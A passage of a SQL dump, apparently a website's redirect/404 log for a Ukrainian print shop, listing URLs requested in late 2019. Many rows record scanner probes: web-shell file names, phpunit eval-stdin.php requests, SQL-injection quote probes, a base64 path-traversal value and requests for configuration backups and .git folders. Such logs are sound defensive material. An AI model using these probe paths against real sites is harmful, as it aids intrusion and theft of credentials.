00:00:00',301),(15556,'https://ekvatorprint.com.ua/ekvatorprint_db.sql.tar',NULL,'https://ekvatorprint.com.ua/','',3,0,'2019-10-11 04:55:43','0000-00-00 00:00:00',301),(15557,'http://ekvatorprint.com.ua/errors/default/css/styles.css',NULL,'','',1,0,'2019-10-11 07:29:15','0000-00-00 00:00:00',301),(15558,'http://ekvatorprint.com.ua/shop/js/mage/cookies.js',NULL,'','',1,0,'2019-10-11 13:01:20','0000-00-00 00:00:00',301),(15559,'http://ekvatorprint.com.ua/store/js/mage/cookies.js',NULL,'','',1,0,'2019-10-11 13:01:24','0000-00-00 00:00:00',301),(15560,'http://ekvatorprint.com.ua/market/js/mage/cookies.js',NULL,'','',1,0,'2019-10-11 13:01:24','0000-00-00 00:00:00',301),(15561,'http://ekvatorprint.com.ua/loja/js/mage/cookies.js',NULL,'','',1,0,'2019-10-11 13:01:25','0000-00-00 00:00:00',301),(15562,'https://ekvatorprint.com.ua/index.php?option=com_ninjaboard&view=forums',NULL,'','',6,0,'2019-10-11 14:12:26','0000-00-00 00:00:00',301),(15563,'https://ekvatorprint.com.ua/index.php?option=com_ccboard',NULL,'','',6,0,'2019-10-11 14:12:27','0000-00-00 00:00:00',301),(15564,'https://ekvatorprint.com.ua/index.php?option=com_joobb&view=board',NULL,'','',6,0,'2019-10-11 14:12:28','0000-00-00 00:00:00',301),(15565,'https://ekvatorprint.com.ua/index.php/blog/item/add/?tmpl=component',NULL,'','',6,0,'2019-10-11 14:12:31','0000-00-00 00:00:00',301),(15566,'https://ekvatorprint.com.ua/index.php/component/k2/item/add/',NULL,'','',6,0,'2019-10-11 14:12:44','0000-00-00 00:00:00',301),(15567,'https://ekvatorprint.com.ua/index.php?option=com_k2&view=item&task=add',NULL,'','',6,0,'2019-10-11 14:12:57','0000-00-00 00:00:00',301),(15568,'https://ekvatorprint.com.ua/index.php?option=com_user&view=user&task=edit',NULL,'','',6,0,'2019-10-11 14:13:28','0000-00-00 00:00:00',301),(15569,'https://ekvatorprint.com.ua/index.php/sign-in/profile?layout=edit',NULL,'','',6,0,'2019-10-11 14:13:46','0000-00-00 00:00:00',301),(15570,'https://ekvatorprint.com.ua/index.php?option=com_myblog',NULL,'','',6,0,'2019-10-11 14:14:04','0000-00-00 00:00:00',301),(15571,'https://ekvatorprint.com.ua/index.php?option=com_comprofiler',NULL,'','',7,0,'2019-10-11 14:14:20','0000-00-00 00:00:00',301),(15572,'https://ekvatorprint.com.ua/index.php?option=com_easysocial',NULL,'','',7,0,'2019-10-11 14:14:21','0000-00-00 00:00:00',301),(15573,'https://ekvatorprint.com.ua/index.php?option=com_agorapro',NULL,'','',7,0,'2019-10-11 14:14:22','0000-00-00 00:00:00',301),(15574,'https://ekvatorprint.com.ua/index.php?option=com_agora',NULL,'','',7,0,'2019-10-11 14:14:23','0000-00-00 00:00:00',301),(15575,'https://ekvatorprint.com.ua/shop/errors/default/css/styles.css ',NULL,'','',1,0,'2019-10-12 07:43:54','0000-00-00 00:00:00',301),(15576,'https://ekvatorprint.com.ua/store/errors/default/css/styles.css ',NULL,'','',1,0,'2019-10-12 07:43:55','0000-00-00 00:00:00',301),(15577,'https://ekvatorprint.com.ua/market/errors/default/css/styles.css ',NULL,'','',1,0,'2019-10-12 07:43:56','0000-00-00 00:00:00',301),(15578,'https://ekvatorprint.com.ua/loja/errors/default/css/styles.css ',NULL,'','',1,0,'2019-10-12 07:43:58','0000-00-00 00:00:00',301),(15579,'http://ekvatorprint.com.ua/dev/js/mage/cookies.js',NULL,'','',1,0,'2019-10-12 09:49:45','0000-00-00 00:00:00',301),(15580,'http://ekvatorprint.com.ua/magento/js/mage/cookies.js',NULL,'','',1,0,'2019-10-12 09:49:47','0000-00-00 00:00:00',301),(15581,'http://ekvatorprint.com.ua/mag/js/mage/cookies.js',NULL,'','',1,0,'2019-10-12 09:49:48','0000-00-00 00:00:00',301),(15582,'http://ekvatorprint.com.ua/test/js/mage/cookies.js',NULL,'','',1,0,'2019-10-12 09:49:50','0000-00-00 00:00:00',301),(15583,'http://ekvatorprint.com.ua/demo/js/mage/cookies.js',NULL,'','',1,0,'2019-10-12 09:49:50','0000-00-00 00:00:00',301),(15584,'http://ekvatorprint.com.ua/shops/js/mage/cookies.js',NULL,'','',1,0,'2019-10-12 09:49:51','0000-00-00 00:00:00',301),(15585,'http://ekvatorprint.com.ua/development/js/mage/cookies.js',NULL,'','',1,0,'2019-10-12 09:49:52','0000-00-00 00:00:00',301),(15586,'https://ekvatorprint.com.ua/ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:42','0000-00-00 00:00:00',301),(15587,'https://ekvatorprint.com.ua/forum/ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:43','0000-00-00 00:00:00',301),(15588,'https://ekvatorprint.com.ua/forums/ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:45','0000-00-00 00:00:00',301),(15589,'https://ekvatorprint.com.ua/forums/index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:45','0000-00-00 00:00:00',301),(15590,'https://ekvatorprint.com.ua/vb/ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:46','0000-00-00 00:00:00',301),(15591,'https://ekvatorprint.com.ua/vb/index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:46','0000-00-00 00:00:00',301),(15592,'https://ekvatorprint.com.ua/board/ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:47','0000-00-00 00:00:00',301),(15593,'https://ekvatorprint.com.ua/board/index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:47','0000-00-00 00:00:00',301),(15594,'https://ekvatorprint.com.ua/boards/ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:48','0000-00-00 00:00:00',301),(15595,'https://ekvatorprint.com.ua/boards/index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:48','0000-00-00 00:00:00',301),(15596,'https://ekvatorprint.com.ua/f/ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:48','0000-00-00 00:00:00',301),(15597,'https://ekvatorprint.com.ua/f/index.php?routestring=ajax/render/widget_php',NULL,'','',1,0,'2019-10-12 11:48:49','0000-00-00 00:00:00',301),(15598,'https://ekvatorprint.com.ua/modules/mod_up/mod_up.php',NULL,'','',9,0,'2019-10-12 22:51:11','0000-00-00 00:00:00',301),(15599,'https://ekvatorprint.com.ua/wp-blog-mail.php',NULL,'http://site.ru','',6,0,'2019-10-14 13:26:04','0000-00-00 00:00:00',301),(15600,'https://ekvatorprint.com.ua/404.php.suspected',NULL,'http://site.ru','',5,0,'2019-10-14 16:42:46','0000-00-00 00:00:00',301),(15601,'https://ekvatorprint.com.ua/meuhy.php',NULL,'http://site.ru','',5,0,'2019-10-14 16:52:52','0000-00-00 00:00:00',301),(15602,'https://ekvatorprint.com.ua/wp-organizer.php',NULL,'http://site.ru','',4,0,'2019-10-14 17:08:39','0000-00-00 00:00:00',301),(15603,'https://ekvatorprint.com.ua/theme.php',NULL,'http://site.ru','',9,0,'2019-10-14 23:35:33','0000-00-00 00:00:00',301),(15604,'https://ekvatorprint.com.ua/menus/popup-pomo.php',NULL,'http://site.ru','',6,0,'2019-10-15 02:56:29','0000-00-00 00:00:00',301),(15605,'https://ekvatorprint.com.ua/install/popup-pomo.php',NULL,'http://site.ru','',9,0,'2019-10-15 05:39:23','0000-00-00 00:00:00',301),(15606,'https://ekvatorprint.com.ua/htaccess.php',NULL,'http://site.ru','',9,0,'2019-10-15 10:25:23','0000-00-00 00:00:00',301),(15607,'https://ekvatorprint.com.ua/config.php',NULL,'http://site.ru','',46,0,'2019-10-15 11:19:21','0000-00-00 00:00:00',301),(15608,'https://ekvatorprint.com.ua/xnbwlq30scwvvi40xhfewxuld5x1r',NULL,'','',1,0,'2019-10-15 16:48:47','0000-00-00 00:00:00',301),(15609,'https://ekvatorprint.com.ua/libraries/joomla/template/popup-pomo.php',NULL,'http://site.ru','',15,0,'2019-10-15 16:53:09','0000-00-00 00:00:00',301),(15610,'https://ekvatorprint.com.ua/newsleter.php.suspected',NULL,'http://site.ru','',9,0,'2019-10-15 16:58:59','0000-00-00 00:00:00',301),(15611,'https://ekvatorprint.com.ua/babbitts.php',NULL,'http://site.ru','',3,0,'2019-10-16 00:18:42','0000-00-00 00:00:00',301),(15612,'https://ekvatorprint.com.ua/roots.php',NULL,'http://site.ru','',4,0,'2019-10-16 01:32:53','0000-00-00 00:00:00',301),(15613,'https://ekvatorprint.com.ua/wp-back.php',NULL,'http://site.ru','',5,0,'2019-10-16 07:04:03','0000-00-00 00:00:00',301),(15614,'https://ekvatorprint.com.ua/dhon.php',NULL,'http://site.ru','',10,0,'2019-10-16 11:35:15','0000-00-00 00:00:00',301),(15615,'https://ekvatorprint.com.ua/bsmvcjdcothryqwgurs4iowc7n3b',NULL,'','',1,0,'2019-10-16 18:36:38','0000-00-00 00:00:00',301),(15616,'https://ekvatorprint.com.ua/img.php',NULL,'http://site.ru','',9,0,'2019-10-16 20:31:12','0000-00-00 00:00:00',301),(15617,'https://ekvatorprint.com.ua/wss.php',NULL,'http://site.ru','',3,0,'2019-10-16 20:34:26','0000-00-00 00:00:00',301),(15618,'https://ekvatorprint.com.ua/styles/popup-pomo.php',NULL,'http://site.ru','',4,0,'2019-10-16 21:39:08','0000-00-00 00:00:00',301),(15619,'https://ekvatorprint.com.ua/doc.php',NULL,'http://site.ru','',47,0,'2019-10-16 21:56:39','0000-00-00 00:00:00',301),(15620,'https://ekvatorprint.com.ua/eouds.php',NULL,'http://site.ru','',3,0,'2019-10-16 23:52:42','0000-00-00 00:00:00',301),(15621,'https://ekvatorprint.com.ua/support',NULL,'','',1,0,'2019-10-17 00:49:53','0000-00-00 00:00:00',301),(15622,'https://ekvatorprint.com.ua/contact',NULL,'','',4,0,'2019-10-17 00:50:08','0000-00-00 00:00:00',301),(15623,'https://ekvatorprint.com.ua/.bash_history',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-10-17 01:01:02','0000-00-00 00:00:00',301),(15624,'https://ekvatorprint.com.ua/gallery.php',NULL,'http://site.ru','',6,0,'2019-10-17 01:59:04','0000-00-00 00:00:00',301),(15625,'https://ekvatorprint.com.ua/error_log',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-10-17 03:05:06','0000-00-00 00:00:00',301),(15626,'https://ekvatorprint.com.ua/pressthis/popup-pomo.php',NULL,'http://site.ru','',8,0,'2019-10-17 03:55:02','0000-00-00 00:00:00',301),(15627,'https://ekvatorprint.com.ua/res.php',NULL,'http://site.ru','',6,0,'2019-10-17 04:13:26','0000-00-00 00:00:00',301),(15628,'https://ekvatorprint.com.ua/admin.php',NULL,'http://site.ru','',49,0,'2019-10-17 04:15:37','0000-00-00 00:00:00',301),(15629,'https://ekvatorprint.com.ua/wp-console.php',NULL,'http://site.ru','',6,0,'2019-10-17 05:07:41','0000-00-00 00:00:00',301),(15630,'https://ekvatorprint.com.ua/licensed.php',NULL,'http://site.ru','',5,0,'2019-10-17 09:26:46','0000-00-00 00:00:00',301),(15631,'https://ekvatorprint.com.ua/conf.php',NULL,'http://site.ru','',5,0,'2019-10-17 09:56:02','0000-00-00 00:00:00',301),(15632,'https://ekvatorprint.com.ua/components/com_foxcontact/line.php',NULL,'http://site.ru','',3,0,'2019-10-17 10:18:03','0000-00-00 00:00:00',301),(15633,'https://ekvatorprint.com.ua/components/com_user/views/reset/mod.php',NULL,'http://site.ru','',5,0,'2019-10-17 10:18:15','0000-00-00 00:00:00',301),(15634,'https://ekvatorprint.com.ua/includes/img/mode.php',NULL,'http://site.ru','',5,0,'2019-10-17 10:22:27','0000-00-00 00:00:00',301),(15635,'https://ekvatorprint.com.ua/word-defence-waf.php',NULL,'http://site.ru','',4,0,'2019-10-17 11:03:17','0000-00-00 00:00:00',301),(15636,'https://ekvatorprint.com.ua/hello.php',NULL,'http://site.ru','',16,0,'2019-10-17 11:34:41','0000-00-00 00:00:00',301),(15637,'https://ekvatorprint.com.ua/media/mod.php',NULL,'http://site.ru','',11,0,'2019-10-17 11:46:21','0000-00-00 00:00:00',301),(15638,'https://ekvatorprint.com.ua/feal.php',NULL,'http://site.ru','',11,0,'2019-10-17 11:58:56','0000-00-00 00:00:00',301),(15639,'https://ekvatorprint.com.ua/modules/img/mode.php',NULL,'http://site.ru','',10,0,'2019-10-17 12:24:47','0000-00-00 00:00:00',301),(15640,'https://ekvatorprint.com.ua/libraries/joomla/template/wp-cofigs.php',NULL,'http://site.ru','',5,0,'2019-10-17 12:29:41','0000-00-00 00:00:00',301),(15641,'https://ekvatorprint.com.ua/fresh1.php',NULL,'http://site.ru','',1,0,'2019-10-17 12:52:34','0000-00-00 00:00:00',301),(15642,'https://ekvatorprint.com.ua/libraries/joomla/template/into.php',NULL,'http://site.ru','',3,0,'2019-10-17 13:32:41','0000-00-00 00:00:00',301),(15643,'https://ekvatorprint.com.ua/libraries/phpmailer/language/popup-pomo.php',NULL,'http://site.ru','',1,0,'2019-10-17 14:29:04','0000-00-00 00:00:00',301),(15644,'https://ekvatorprint.com.ua/cache/wp-console.php',NULL,'http://site.ru','',5,0,'2019-10-17 15:05:59','0000-00-00 00:00:00',301),(15645,'https://ekvatorprint.com.ua/index.php?option=com_swphotogallery&lang=fr&location=1\'',NULL,'','',2,0,'2019-10-18 16:33:59','0000-00-00 00:00:00',301),(15646,'https://ekvatorprint.com.ua/index.php?option=com_cactus&album=1\'',NULL,'','',2,0,'2019-10-18 16:34:00','0000-00-00 00:00:00',301),(15647,'https://ekvatorprint.com.ua/index.php?option=com_sumoku&itemid=1\'&lang=fr',NULL,'','',2,0,'2019-10-18 16:34:00','0000-00-00 00:00:00',301),(15648,'https://ekvatorprint.com.ua/index.php?option=com_misterestate&view=search&task=showmesr&itemid=3\'&lang=en',NULL,'','',2,0,'2019-10-18 16:34:01','0000-00-00 00:00:00',301),(15649,'https://ekvatorprint.com.ua/index.php?option=com_medialibrary&task=view&id=98&catid=89&itemid=1\'&lang=en',NULL,'','',2,0,'2019-10-18 16:34:01','0000-00-00 00:00:00',301),(15650,'https://ekvatorprint.com.ua/board/',NULL,'','',1,0,'2019-10-19 15:09:03','0000-00-00 00:00:00',301),(15651,'https://ekvatorprint.com.ua/boards/',NULL,'','',1,0,'2019-10-19 15:09:04','0000-00-00 00:00:00',301),(15652,'https://ekvatorprint.com.ua/f/',NULL,'','',1,0,'2019-10-19 15:09:09','0000-00-00 00:00:00',301),(15653,'https://ekvatorprint.com.ua/shop/wp-login.php',NULL,'http://ekvatorprint.com.ua/shop/wp-login.php','',1,0,'2019-10-20 02:04:44','0000-00-00 00:00:00',301),(15654,'https://ekvatorprint.com.ua/2015/wp-login.php',NULL,'http://ekvatorprint.com.ua/2015/wp-login.php','',1,0,'2019-10-20 03:20:43','0000-00-00 00:00:00',301),(15655,'https://ekvatorprint.com.ua/2016/wp-login.php',NULL,'http://ekvatorprint.com.ua/2016/wp-login.php','',1,0,'2019-10-20 04:38:05','0000-00-00 00:00:00',301),(15656,'https://ekvatorprint.com.ua/accesson1.php',NULL,'ekvatorprint.com.ua','',20,0,'2019-10-22 09:38:28','0000-00-00 00:00:00',301),(15657,'https://ekvatorprint.com.ua/components/modules.php',NULL,'','',3,0,'2019-10-23 08:53:36','0000-00-00 00:00:00',301),(15658,'https://ekvatorprint.com.ua/print-grea',NULL,'','',1,0,'2019-10-23 21:03:30','0000-00-00 00:00:00',301),(15659,'https://ekvatorprint.com.ua/zqxl4jvbos7ftmm5fw6pihkkj',NULL,'','',1,0,'2019-10-27 12:40:47','0000-00-00 00:00:00',301),(15660,'https://ekvatorprint.com.ua/index.php?option=com_easyshop&task=ajax.loadimage&file=li4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',1,0,'2019-10-28 01:13:49','0000-00-00 00:00:00',301),(15661,'https://ekvatorprint.com.ua/admibistrator',NULL,'','',1,0,'2019-10-28 09:32:12','0000-00-00 00:00:00',301),(15662,'https://ekvatorprint.com.ua/administrator/components/com_jsjobs/com_jsjobs.xml',NULL,'','',2,0,'2019-10-30 05:13:43','0000-00-00 00:00:00',301),(15663,'https://ekvatorprint.com.ua/wp-load.php?up2018info=1',NULL,'','',3,0,'2019-10-30 17:20:05','0000-00-00 00:00:00',301),(15664,'https://ekvatorprint.com.ua/wp.php?up2018info=1',NULL,'','',1,0,'2019-10-31 10:51:30','0000-00-00 00:00:00',301),(15665,'https://ekvatorprint.com.ua/wp-bb.php?up2018info=1',NULL,'','',3,0,'2019-11-01 05:00:27','0000-00-00 00:00:00',301),(15666,'https://ekvatorprint.com.ua/wp-aa.php?up2018info=1',NULL,'','',3,0,'2019-11-01 22:56:28','0000-00-00 00:00:00',301),(15667,'https://ekvatorprint.com.ua/accesson.php',NULL,'','',11,0,'2019-11-02 16:42:43','0000-00-00 00:00:00',301),(15668,'https://ekvatorprint.com.ua/.git/',NULL,'','',1,0,'2019-11-03 03:42:21','0000-00-00 00:00:00',301),(15669,'https://ekvatorprint.com.ua/configuration.php.save',NULL,'','',1,0,'2019-11-03 10:39:39','0000-00-00 00:00:00',301),(15670,'https://ekvatorprint.com.ua/backup/wp-admin/install.php',NULL,'','',6,0,'2019-11-04 13:48:57','0000-00-00 00:00:00',301),(15671,'https://ekvatorprint.com.ua/bk/wp-admin/install.php',NULL,'','',2,0,'2019-11-04 13:49:24','0000-00-00 00:00:00',301),(15672,'https://ekvatorprint.com.ua/old/wp-admin/install.php',NULL,'','',6,0,'2019-11-04 13:51:01','0000-00-00 00:00:00',301),(15673,'https://ekvatorprint.com.ua/test/wp-admin/install.php',NULL,'','',6,0,'2019-11-04 13:52:01','0000-00-00 00:00:00',301),(15674,'https://ekvatorprint.com.ua/cms/wp-admin/install.php',NULL,'','',6,0,'2019-11-04 13:52:33','0000-00-00 00:00:00',301),(15675,'https://ekvatorprint.com.ua/demo/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 13:53:11','0000-00-00 00:00:00',301),(15676,'https://ekvatorprint.com.ua/temp/wp-admin/install.php',NULL,'','',2,0,'2019-11-04 13:53:38','0000-00-00 00:00:00',301),(15677,'https://ekvatorprint.com.ua/home/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 13:54:04','0000-00-00 00:00:00',301),(15678,'https://ekvatorprint.com.ua/main/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 13:54:42','0000-00-00 00:00:00',301),(15679,'https://ekvatorprint.com.ua/site/wp-admin/install.php',NULL,'','',5,0,'2019-11-04 13:55:16','0000-00-00 00:00:00',301),(15680,'https://ekvatorprint.com.ua/tmp/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 13:55:48','0000-00-00 00:00:00',301),(15681,'https://ekvatorprint.com.ua/.configuration.php.swp',NULL,'','',1,0,'2019-11-04 14:42:25','0000-00-00 00:00:00',301),(15682,'https://ekvatorprint.com.ua/plus/erraddsave.php',NULL,'','',1,0,'2019-11-05 04:16:08','0000-00-00 00:00:00',301),(15683,'https://ekvatorprint.com.ua/configuration.php.save.1',NULL,'','',1,0,'2019-11-05 18:34:09','0000-00-00 00:00:00',301),(15684,'https://ekvatorprint.com.ua/include/taglib/ty.lib.php',NULL,'http://ekvatorprint.com.ua//include/taglib/ty.lib.php','',3,0,'2019-11-05 23:15:33','0000-00-00 00:00:00',301),(15685,'https://ekvatorprint.com.ua/plus/mytag_js.php?aid=511348',NULL,'http://ekvatorprint.com.ua//plus/mytag_js.php?aid=511348','',8,0,'2019-11-05 23:15:34','0000-00-00 00:00:00',301),(15686,'https://ekvatorprint.com.ua/config/aspcms_config.asp',NULL,'http://ekvatorprint.com.ua//config/AspCms_Config.asp','',3,0,'2019-11-05 23:15:36','0000-00-00 00:00:00',301),(15687,'https://ekvatorprint.com.ua/config_shell.php',NULL,'http://ekvatorprint.com.ua//Config_Shell.php','',3,0,'2019-11-05 23:15:37','0000-00-00 00:00:00',301),(15688,'https://ekvatorprint.com.ua/include/taglib/cheng.lib.php',NULL,'http://ekvatorprint.com.ua//include/taglib/cheng.lib.php','',3,0,'2019-11-05 23:15:37','0000-00-00 00:00:00',301),(15689,'https://ekvatorprint.com.ua/include/taglib/716.lib.php',NULL,'http://ekvatorprint.com.ua//include/taglib/716.lib.php','',3,0,'2019-11-05 23:15:38','0000-00-00 00:00:00',301),(15690,'https://ekvatorprint.com.ua/include/taglib/2018gf.lib.php',NULL,'http://ekvatorprint.com.ua//include/taglib/2018gf.lib.php','',3,0,'2019-11-05 23:15:39','0000-00-00 00:00:00',301),(15691,'https://ekvatorprint.com.ua/include/taglib/201907.lib.php',NULL,'http://ekvatorprint.com.ua//include/taglib/201907.lib.php','',3,0,'2019-11-05 23:15:40','0000-00-00 00:00:00',301),(15692,'https://ekvatorprint.com.ua/vgvmfhkaf9',NULL,'','',1,0,'2019-11-06 00:13:04','0000-00-00 00:00:00',301),(15693,'https://ekvatorprint.com.ua/.configuration.php.swo',NULL,'','',1,0,'2019-11-06 22:11:14','0000-00-00 00:00:00',301),(15694,'https://ekvatorprint.com.ua/configuration.php.backup',NULL,'','',3,0,'2019-11-08 01:55:38','0000-00-00 00:00:00',301),(15695,'https://ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттерная',NULL,'','',38,0,'2019-11-08 12:27:29','0000-00-00 00:00:00',301),(15696,'https://ekvatorprint.com.ua/templates/ja_purity_iii/index.php',NULL,'','',2,0,'2019-11-08 14:21:09','0000-00-00 00:00:00',301),(15697,'https://ekvatorprint.com.ua/components/com_foxcontact/_func.php',NULL,'','',4,0,'2019-11-08 14:21:09','0000-00-00 00:00:00',301),(15698,'https://ekvatorprint.com.ua/templates/ja_purity_ii/index.php',NULL,'','',3,0,'2019-11-08 14:21:09','0000-00-00 00:00:00',301),(15699,'http://ekvatorprint.com.ua/app-ads.txt',NULL,'http://ekvatorprint.com.ua/app-ads.txt','',38,0,'2019-11-09 19:11:30','0000-00-00 00:00:00',301),(15700,'https://ekvatorprint.com.ua/configuration.php.save.2',NULL,'','',1,0,'2019-11-11 04:45:01','0000-00-00 00:00:00',301),(15701,'https://ekvatorprint.com.ua/installation/localise.xml',NULL,'','',1,0,'2019-11-11 16:33:35','0000-00-00 00:00:00',301),(15702,'https://ekvatorprint.com.ua/installation/language/de-ch/de-ch.xml',NULL,'','',1,0,'2019-11-11 16:33:35','0000-00-00 00:00:00',301),(15703,'https://ekvatorprint.com.ua/installation/language/de-lu/de-lu.xml',NULL,'','',1,0,'2019-11-11 16:33:36','0000-00-00 00:00:00',301),(15704,'https://ekvatorprint.com.ua/installation/language/de-de/de-de.xml',NULL,'','',1,0,'2019-11-11 16:33:36','0000-00-00 00:00:00',301),(15705,'https://ekvatorprint.com.ua/installation/language/en-ca/en-ca.xml',NULL,'','',4,0,'2019-11-11 16:33:36','0000-00-00 00:00:00',301),(15706,'https://ekvatorprint.com.ua/installation/language/de-at/de-at.xml',NULL,'','',1,0,'2019-11-11 16:33:36','0000-00-00 00:00:00',301),(15707,'https://ekvatorprint.com.ua/installation/language/en-nz/en-nz.xml',NULL,'','',4,0,'2019-11-11 16:33:37','0000-00-00 00:00:00',301),(15708,'https://ekvatorprint.com.ua/installation/language/de-li/de-li.xml',NULL,'','',1,0,'2019-11-11 16:33:37','0000-00-00 00:00:00',301),(15709,'https://ekvatorprint.com.ua/installation/language/en-au/en-au.xml',NULL,'','',4,0,'2019-11-11 16:33:37','0000-00-00 00:00:00',301),(15710,'https://ekvatorprint.com.ua/backup',NULL,'','',40,0,'2019-11-13 00:00:47','0000-00-00 00:00:00',301),(15711,'https://ekvatorprint.com.ua/upload',NULL,'','',1,0,'2019-11-13 01:04:46','0000-00-00 00:00:00',301),(15712,'https://ekvatorprint.com.ua/docker-compose.yml',NULL,'','',1,0,'2019-11-14 18:15:48','0000-00-00 00:00:00',301),(15713,'https://ekvatorprint.com.ua/asset-manifest.json',NULL,'https://ekvatorprint.com.ua/','',43,0,'2019-11-16 10:30:56','0000-00-00 00:00:00',301),(15714,'https://ekvatorprint.com.ua/openings',NULL,'','',1,0,'2019-11-16 14:09:20','0000-00-00 00:00:00',301),(15715,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/util/php/eval-stdin.php',NULL,'','',3,0,'2019-11-17 13:50:15','0000-00-00 00:00:00',301),(15716,'https://ekvatorprint.com.ua/vendor/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-17 13:50:25','0000-00-00 00:00:00',301),(15717,'https://ekvatorprint.com.ua/vendor/phpunit/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-17 13:50:36','0000-00-00 00:00:00',301),(15718,'https://ekvatorprint.com.ua/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-17 13:50:45','0000-00-00 00:00:00',301),(15719,'https://ekvatorprint.com.ua/phpunit/phpunit/util/php/eval-stdin.php',NULL,'','',3,0,'2019-11-17 13:50:55','0000-00-00 00:00:00',301),(15720,'https://ekvatorprint.com.ua/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-17 13:51:04','0000-00-00 00:00:00',301),(15721,'https://ekvatorprint.com.ua/phpunit/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-17 13:51:18','0000-00-00 00:00:00',301),(15722,'https://ekvatorprint.com.ua/lib/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-17 13:51:28','0000-00-00 00:00:00',301),(15723,'https://ekvatorprint.com.ua/lib/phpunit/phpunit/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-17 13:51:41','0000-00-00 00:00:00',301),(15724,'https://ekvatorprint.com.ua/lib/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-17 13:51:51','0000-00-00 00:00:00',301),(15725,'https://ekvatorprint.com.ua/lib/phpunit/util/php/eval-stdin.php',NULL,'','',3,0,'2019-11-17 13:52:00','0000-00-00 00:00:00',301),(15726,'https://ekvatorprint.com.ua/panel/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-17 13:52:13','0000-00-00 00:00:00',301),(15727,'https://ekvatorprint.com.ua/test/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',7,0,'2019-11-17 13:52:23','0000-00-00 00:00:00',301),(15728,'https://ekvatorprint.com.ua/admin/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',9,0,'2019-11-17 13:52:33','0000-00-00 00:00:00',301),(15729,'https://ekvatorprint.com.ua/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',9,0,'2019-11-17 13:52:43','0000-00-00 00:00:00',301),(15730,'http://ekvatorprint.com.ua/images/modulnie kartini/??-129.png',NULL,'','',1,0,'2019-11-17 15:26:03','0000-00-00 00:00:00',301),(15731,'https://ekvatorprint.com.ua/wp-version.php',NULL,'','',7,0,'2019-11-19 14:01:06','0000-00-00 00:00:00',301),(15732,'https://ekvatorprint.com.ua/phpmyadmin/scripts/setup.php',NULL,'','',15,0,'2019-11-20 03:05:50','0000-00-00 00:00:00',301),(15733,'https://ekvatorprint.com.ua/sadad24',NULL,'','',1,0,'2019-11-20 03:05:52','0000-00-00 00:00:00',301),(15734,'https://ekvatorprint.com.ua/login?from=/',NULL,'','',1,0,'2019-11-20 03:05:52','0000-00-00 00:00:00',301),(15735,'https://ekvatorprint.com.ua/j17iitrqusyqpf1fwwf50vejoqfg',NULL,'','',1,0,'2019-11-20 09:54:50','0000-00-00 00:00:00',301),(15736,'https://ekvatorprint.com.ua/desktopmodules/admin/radeditorprovider/dialoghandler.aspx',NULL,'','',3,0,'2019-11-21 15:54:04','0000-00-00 00:00:00',301),(15737,'https://ekvatorprint.com.ua/vuln.php',NULL,'','',10,0,'2019-11-22 14:39:00','0000-00-00 00:00:00',301),(15738,'https://ekvatorprint.com.ua/.svn/wc.db',NULL,'','',2,0,'2019-11-23 10:57:19','0000-00-00 00:00:00',301),(15739,'https://ekvatorprint.com.ua/base/appfile.php',NULL,'http://ekvatorprint.com.ua/base/appfile.php','',1,0,'2019-11-23 14:05:17','0000-00-00 00:00:00',301),(15740,'https://ekvatorprint.com.ua/code.php.php',NULL,'','',4,0,'2019-11-26 09:15:14','0000-00-00 00:00:00',301),(15741,'https://ekvatorprint.com.ua/images/vuln2.php',NULL,'','',12,0,'2019-11-27 10:16:35','0000-00-00 00:00:00',301),(15742,'https://ekvatorprint.com.ua/tmp/vuln2.php',NULL,'','',12,0,'2019-11-27 10:16:36','0000-00-00 00:00:00',301),(15743,'https://ekvatorprint.com.ua/plugins/modules.php',NULL,'','',3,0,'2019-11-27 17:16:58','0000-00-00 00:00:00',301),(15744,'https://ekvatorprint.com.ua/ed21ewcpl69ww3dz',NULL,'','',1,0,'2019-11-28 02:15:47','0000-00-00 00:00:00',301),(15745,'https://ekvatorprint.com.ua/index.php/component/user/?task=register',NULL,'','',1,0,'2019-11-30 04:27:51','0000-00-00 00:00:00',301),(15746,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/xsam_xadoo_bot.php',NULL,'','',1,0,'2019-12-01 00:42:47','0000-00-00 00:00:00',301),(15747,'https://ekvatorprint.com.ua/modules/mod_socialpinboard_menu/saveimagefromupload.php',NULL,'','',1,0,'2019-12-01 00:43:03','0000-00-00 00:00:00',301),(15748,'https://ekvatorprint.com.ua/modules/mod_socialpinboard_menu/images/socialpinboard/temp/xsam_xadoo_bot.php',NULL,'','',1,0,'2019-12-01 00:43:17','0000-00-00 